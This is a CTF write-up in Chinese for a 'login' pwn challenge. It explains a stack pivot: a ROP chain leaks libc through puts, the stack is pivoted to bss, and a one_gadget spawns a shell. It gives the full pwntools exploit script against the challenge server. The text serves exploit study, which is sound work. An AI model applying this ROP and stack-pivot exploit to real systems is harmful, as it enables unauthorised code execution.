以此记载比较复杂的栈迁移。
s1和buf都以‘admin\x00'开头就可以了,buf最多只能覆盖rbp,此函数执行完之后就是
leave,retn ;一眼栈迁移。
s1能写一些exp,一眼迁移到s1。
首先肯定要泄露基址,但是s1第一个0x8是'admin\x00\x00\x00',所以可用的实际只有0x18。
pop_rdi+puts_got就占用了0x10,所以后面必须找一个能调用puts并重新写入payload的地址。
继续在ida中查找:
这个0x4018B5就刚刚好,能直接执行puts,再重新执行一遍读入的函数。
所以第一段payload就是:
pop=0x0000000000401ab3
puts=elf.got['puts']
back=0x4018B5
payload=b'admin'.ljust(0x8,b'\x00')+p64(pop)+p64(puts)+p64(back)
这样就成功泄露libc基址了。
现在,我们需要想一下back中执行read时,rsp,rbp等的空间情况。
以下是简略的图。
第二次读入输入'admin\x00\x00\x00'*3+one_gadget+(buf)就可以了。
system应该也能构造,但栈可能要再迁移一轮,就是用one_gadget算了。
以下是全部代码:
from pwn import *
context.arch='amd64'
io=remote('node4.anna.nssctf.cn',28371)
io.recvuntil(b'>')
elf=ELF('./login')
libc=ELF('./libc.so.6')
pop=0x0000000000401ab3
puts=elf.got['puts']
back=0x4018B5
payload=b'admin'.ljust(0x8,b'\x00')+p64(pop)+p64(puts)+p64(back)
io.send(payload)
io.recvuntil(b'>')
bss=0x602400
payload=b'admin'.ljust(0x20,b'\x00')+p64(bss)
io.send(payload)
puts=u64(io.recvuntil(b'\x7f')[-6:].ljust(0x8,b'\x00'))
libc_base=puts-libc.sym['puts']
io.recvuntil(b'>')
payload=b'admin'.ljust(0x8,b'\x00')
io.sendline(payload)
io.recvuntil(b'>')
one_gadget=0x4527a+libc_base
payload=b'admin'.ljust(0x8,b'\x00')+b'admin'.ljust(0x8,b'\x00')+b'admin'.ljust(0x8,b'\x00')+p64(one_gadget)+p64(bss)
io.send(payload)
io.interactive()
此题我本来使用的是之前一题的libc.so.6,一直打不通,后来用了题目提供的才成功。
原来libc.so.6之间也会有差别,以后做题尽量使用题目提供的libc。